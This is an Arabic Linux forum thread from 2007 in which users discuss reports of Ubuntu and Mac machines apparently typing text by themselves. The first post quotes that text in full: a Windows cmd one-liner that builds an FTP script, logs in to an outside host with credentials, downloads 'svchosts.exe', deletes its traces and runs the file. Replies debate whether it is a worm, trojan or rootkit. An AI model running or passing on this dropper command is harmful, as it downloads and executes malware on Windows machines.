إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

دودة (worm) انتقلت من واندوس الي لنكس

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • دودة (worm) انتقلت من واندوس الي لنكس

    سلام

    كنت اتصفح موقع ubuntu و وجدت موظوع شيق و يستحق الاهتمام
    يبدو ان دودة (worm) انتقلت من واندوس الي لنكس و فعلت سكربت script علي لنكس

    تحدث هذة الظاهرة عند تشغيل اي برنامج يمكن كتابة نص في هذا البرنامج مثل
    متصفح
    محرر نصوص
    شيل

    عند تشغيل البرنامج تظهر هذة العبارات
    ystemroot%\system32\cmd.exe
    cmd /c echo open ftp.vertinet.com 21 >> ik &echo user niki Denim7 >> ik &echo binary >> ik &echo get svchosts.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchosts.exe &exit
    مكتوبة داخل محرر النصوص او المصفح او غيرة

    للمزيد هذا العنوان
    http://www.ubuntuforums.org/showthread.php?t=378028
    لابد ان نسأل لماذا......
    لابد ان نبحث عن أجوبة.....
    لابد ان تكون متوافقة مع العقل و الواقع.....
    الحمد لله الذي منحنا هذه النعم.

  • #2
    شكرا ياباشا ع الإفادة ألف شكر .


    just a User innately
    اللهم اهدنا إلى الطيب من القول ؛ واهدنا إلى صراط الحميد

    تعليق


    • #3
      لا يبدو انك قرأت الموضوع بتمعن او انك نقلته على عجل على ما يبدو... اولا لا يوجد دودة تنتقل من ويندوز الى لينكس كما يذكر موضوعك، الواضح من الموضوع ان صاحب الجهاز rooted و يبدو ان هناك rootkit استخدمت على جهازه و تم نقل هذا الملف عليها، اي ان الدودة لم تنتقل تلقائيا لوحدها على جهاز اللينكس كما تفعل في انظمة الويندوز دون علم الادمن. كما انك لا بد ولاحظت ان الاوامر المكتوبة هي لويندوز و ان الدودة (اذا كانت دودة اصلا لأنه الكود لا يشير الى انها كذلك) لن تعمل شيء على جهاز اللينكس. لذا يبدو ان جهازه اصلا تم اختراقه و احدهم وضع عليه هذا الملف. و انك ستلاجظ في اللوغ الخاص بالاباتشي العديد من هذه الامور اذا كان مستخدمي ويندوز يستخدمون موقعك و اجهزتهم مصابة.
      V.I.P

      (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
      هود 115

      Linux is user-friendly, but it happens to be selective about its friends

      "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


      مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


      تعليق


      • #4
        سلام

        شكرا يا اخوان

        اخوي greyhunter

        قرات ال4 صفحات فقد كان موضوع شيق بالنسبة لي , اصبت ان هذة ليست تصرفات دودة و لاكن هذة تصرفات خيل طروادة
        ولا نستطيع ان نجزم ان rootkit هيا التي تقوم بذلك
        فقد قام بعضهم بعمل مسح للجهاز ولم يجد شي
        I have run rkhunter, chkrootkit, and clamav on the sytem and have detected nothing. I have done a file search looking for that text string, and have come up with nothing.
        و الحقيقة ان المشكلة هيا كيف اصيب الجهاز و ليست كيف ازالة هذا السكربت
        البعض اعتقد ان المستخدم حمل wine و لذلك .exe يعمل علي جهازة؟
        حقيقة لا اعلم و لو تقرا الموضوع كامل تلاحض ان عدد المصابين كبير
        ubuntu -1
        looks like a script that is trying to install a trojan on my system.
        Mac -1
        yea...im on a mac and it did that to me.

        i was just typing to my friend and it was randomly typing that....... it was REALLY weird
        ubuntu -3
        Interesting thread, seeing as how I received an email today from 3 different people running Ubuntu (one Kubuntu too) saying exactly the same thing - "there's a pop up that's typing by itself".
        هذا العدد يثبت ان هناك شي غير عادي
        و الله اعلم
        التعديل الأخير تم بواسطة زياد الهندي; الساعة 18-03-2007, 02:52 PM.
        لابد ان نسأل لماذا......
        لابد ان نبحث عن أجوبة.....
        لابد ان تكون متوافقة مع العقل و الواقع.....
        الحمد لله الذي منحنا هذه النعم.

        تعليق

        يعمل...
        X